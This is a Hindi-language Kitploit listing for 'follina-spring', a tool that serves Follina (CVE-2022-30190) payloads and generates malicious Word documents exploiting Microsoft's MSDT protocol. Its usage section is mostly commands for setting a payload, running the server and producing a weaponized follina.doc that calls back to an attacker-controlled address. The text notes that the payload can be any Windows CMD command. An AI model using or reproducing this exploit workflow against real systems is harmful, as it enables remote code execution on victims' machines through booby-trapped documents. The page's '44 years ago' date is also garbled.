Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
follina-spring — Follina पेलोड को होस्ट/एक्टिवेट करने के लिए सर्वर और MS-MSDT प्रोटोकॉल का शोषण करने वाले दुर्भावनापूर्ण Word दस्तावेज़ों का जनरेटर। (CVE-2022-30190) | Kitploit
उपकरण/GitHubGitHub/dsibilio/follina-spring
पेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
GitHubdsibilio/follina-spring

follina-spring

Follina पेलोड को होस्ट/एक्टिवेट करने के लिए सर्वर और MS-MSDT प्रोटोकॉल का शोषण करने वाले दुर्भावनापूर्ण Word दस्तावेज़ों का जनरेटर। (CVE-2022-30190)

रिपॉजिटरी देखें
44 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Follina MS-MSDT शोषण स्प्रिंग बूट के साथ

इस रिपॉजिटरी में एक सरल Spring Boot एप्लिकेशन है जो Follina पेलोड को होस्ट/एक्टिवेट करने के लिए सर्वर के रूप में और दुर्भावनापूर्ण Word दस्तावेज़ों के जनरेटर के रूप में कार्य करता है, जो CVE-2022-30190 का शोषण करने के लिए आक्रमण वेक्टर के रूप में उपयोग के लिए तैयार हैं।

इस कमजोरी में MSDT (Microsoft Windows Support Diagnostic Tool) के माध्यम से रिमोट कोड निष्पादन शामिल है।

सर्वर-साइड पेलोड

अपनी पसंद का एक विशेष पेलोड प्रस्तुत करने के लिए, आपको चाहिए:

  • पेलोड को परिभाषित करें, उदा.:
root@kitploit:~
export FOLLINA_PAYLOAD="notepad.exe"
  • स्टैटिक पेलोड को होस्ट करने के लिए सर्वर चलाएँ:
root@kitploit:~
mvn spring-boot:run
  • "Follina" Word दस्तावेज़ उत्पन्न करें:
root@kitploit:~
curl -s http://localhost:8080/generateDoc?address=http://192.168.64.128:8080 -o follina.doc

यदि आप वर्तमान पेलोड को बदलना चाहते हैं, तो आपको पहले वर्तमान में सक्रिय सर्वर को बंद करना होगा, और नए पेलोड को परिभाषित करने के बाद चरणों को दोहराना होगा।

नोट: पेलोड को किसी भी अन्य कमांड से बदला जा सकता है, जब तक कि इसे Windows CMD के माध्यम से चलाया जा सके।

क्लाइंट-साइड पेलोड

अपनी पसंद का क्लाइंट-साइड पेलोड प्रस्तुत करने के लिए, आपको चाहिए:

  • रनटाइम पर पेलोड को सक्रिय करने के लिए सर्वर चलाएँ:
root@kitploit:~
mvn spring-boot:run
  • "Follina" Word दस्तावेज़ उत्पन्न करें जिसमें cmd क्वेरी पैरामीटर निर्दिष्ट हो, उदा.:
root@kitploit:~
curl -sG http://localhost:8080/generateDoc --data-urlencode 'address=http://192.168.64.128:8080' --data-urlencode 'cmd=start msedge.exe https://www.youtube.com/watch?v=zqTwOoElxBA' -o follina.doc

इस मामले में पेलोड दस्तावेज़ के भीतर एम्बेडेड है, और सर्वर से संपर्क करके केवल सक्रियण की आवश्यकता होगी। इस तरह, आप अलग-अलग दस्तावेज़ों में फैले कई अलग-अलग पेलोड रख सकते हैं और पेलोड परिवर्तनों को ट्रिगर करने के लिए आपको सर्वर को रिबूट नहीं करना पड़ेगा - क्योंकि आप बस वांछित पेलोड के साथ एम्बेडेड एक नया दस्तावेज़ उत्पन्न कर सकते हैं।

आभार

John Hammond को बहुत-बहुत धन्यवाद जिन्होंने Python कार्यान्वयन तैयार किया और CVE का अपना विश्लेषण साझा किया।

टूल डाउनलोड करें